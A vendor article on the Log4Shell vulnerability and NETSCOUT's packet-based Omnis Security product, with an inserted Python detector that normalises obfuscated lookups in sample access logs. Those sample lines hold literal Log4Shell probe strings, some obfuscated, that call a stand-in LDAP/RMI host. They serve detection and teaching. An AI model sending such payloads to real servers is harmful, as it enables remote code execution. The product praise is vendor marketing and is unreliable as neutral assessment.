On 09 December, 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It is likely that threat actors already knew about the vulnerability before this date, says Tom Bienkowski, NETSCOUT Product Marketing Director, because it’s been reported that the vulnerability had been exposed much earlier in Minecraft chat forums.
How does Log4j work – and what lessons does it bring?
Log4j, which is open-source software provided by the Apache Software Foundation, records errors and routine system operations, and sends diagnostic messages about them to system administrators and users. A common example of Log4j at work is when a user types in or clicks on a bad web link and receives a 404 error message. The web server running the domain of the attempted web link sends a message to say that the page doesn’t exist, and it also records that event in a log for the server’s system administrators using Log4j. In Minecraft, Log4j is used by the server to log activity such as total memory used and user commands typed into the console.
Log4Shell works by abusing a feature in Log4j that lets users specify custom code for formatting a log message. Unfortunately, that same feature lets a third-party server supply code that can perform all kinds of actions on the targeted computer. This opens the door for threat actors to steal sensitive information and to send malicious content to other users communicating with the affected server.
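The formatting feature described above is Log4j's lookup syntax: the exploit string arrives inside attacker-controlled input (a User-Agent header, a chat message) as a `${jndi:...}` lookup, which Log4j expands when the application logs that input. Because the literal string is easy to spot, probes were commonly wrapped in other lookups (`${lower:j}`, `${::-j}`) so that a naive search for `${jndi:` misses them. The detector below is an added example, not code from the article or from NETSCOUT: it normalises nested lookups inside-out and then checks the result, run here over a handful of constructed web-server access-log lines. The hostnames, IP addresses and timestamps in the sample lines are invented, and the normaliser only understands the `lower`, `upper` and default-value (`:-`) lookup forms; anything else is kept verbatim so that evidence is not lost.

```python
import re

# Innermost ${...} lookups only: no further "${" inside the braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# Case-insensitive match for a JNDI lookup after normalisation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve_inner(body: str) -> str:
    """Reduce one innermost lookup body to the text it would expand to."""
    # ${lower:x} / ${upper:x}: case transformation of x
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.S)
    if m:
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    # ${name:-default} and ${::-default}: the default branch is what gets emitted
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Unknown lookup (e.g. ${date:...}): keep it verbatim rather than guess
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups inside-out until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a (possibly obfuscated) ${jndi:...} lookup."""
    return bool(JNDI_LOOKUP.search(normalize(line)))


def scan(lines):
    """Return (1-based line number, normalised line) for every flagged line."""
    return [(i, normalize(l)) for i, l in enumerate(lines, 1) if is_log4shell_probe(l)]


# Constructed sample access-log lines (hosts, addresses and times are invented).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:08:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:02:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://lookup-host.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:08:03:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOTSET:-j}ndi:rmi://lookup-host.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:08:04:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, normalized in scan(SAMPLE_LOG):
        print(f"line {lineno}: {normalized}")
```

The last sample line carries a harmless `${date:yyyy}` lookup and is deliberately not flagged, which is the check worth keeping in mind: the signal is a JNDI lookup reaching a logger, not the presence of `${` on its own. A hit in the log tells you a probe arrived; whether the server then made an outbound LDAP or RMI connection is what packet-level data, of the kind the article goes on to discuss, can confirm.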
“This vulnerability alerts us to the fact that it is time to start paying attention to packet-based investigations of exploitation,” says Ruan du Preez, Vendor Alliance Director – SA and SADC at Exclusive Networks Africa. “The issue with the Log4j vulnerability was that it could be exploited to download and execute common crypto mining malware, webshells, Cobalt Strike beacons – and undoubtedly ransomware.”
Bienkowski notes that: “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defence against this exploit. But that takes time – a lot of time. Therefore, it should be assumed that before or during this time, bad actors have already compromised one or more of your vulnerable servers.”
He therefore advocates considering the use of packet-based threat detection and investigation as one of the possible tools to detect and remediate the exploitation of such a vulnerability – an area where NETSCOUT undoubtedly excels.
The visibility challenge
Du Preez continues: “In today’s complex networking world – which encompasses legacy networks, branch offices, work-from-home situations and public and private clouds – gaining the proper level of network visibility is more challenging than ever. The threat surface is expanding, and the number of security tools has increased, giving rise to siloed data. Putting this all together, it means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct expedient and effective threat detection and response.
“In addition, when new technologies are implemented rapidly to meet business needs, this often means that security is compromised. This approach can limit visibility and cause security blind spots, which are attractive to threat agents. How do you protect yourself from threats that you can’t see?”
NETSCOUT digs deep into the visibility challenge
NETSCOUT’s solution to this challenge is Omnis™ Security, a platform for advanced threat analytics and response, which provides comprehensive and consistent network visibility for effective cybersecurity.
NETSCOUT’s patented Smart Data technology provides unequalled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now incorporated that same technology into a cybersecurity solution that offers comprehensive network visibility and more efficient cyberthreat detection and response.
About Omnis Security from NETSCOUT
Unlike security information and event management solutions (SIEMs), endpoint detection and response (EDR), or user behaviour analytics (UBA) security technologies, Omnis Security transforms packet data into real-time threat awareness indicators. It empowers your team with relevant contextual data, allowing for swift, decisive action, smarter investigation, and faster, more accurate remediation, as follows:
- You can identify the deep attack context and quickly assess the extent of the breach to isolate the risk.
- You are able to remediate more quickly and accurately than using only non-network traffic data sources.
- Vital forensic reports are created for law enforcement and to support reporting obligations under legislation.
“In the event of a malware attack,” says Du Preez, “NETSCOUT Omnis security offers deep visibility into network traffic, including packet level visibility that can also automatically create a robust set of metadata that gives you visibility into all seven layers of the OSI model, and for many different protocols.
“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and conduct analysis of this data, as well as the ability to conduct high performing decryption.
“While it is true that you can’t protect yourself against a danger that you cannot see, it is also true that in the networking security environment, NETSCOUT is uniquely qualified to be your eyes,” he concludes.
NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.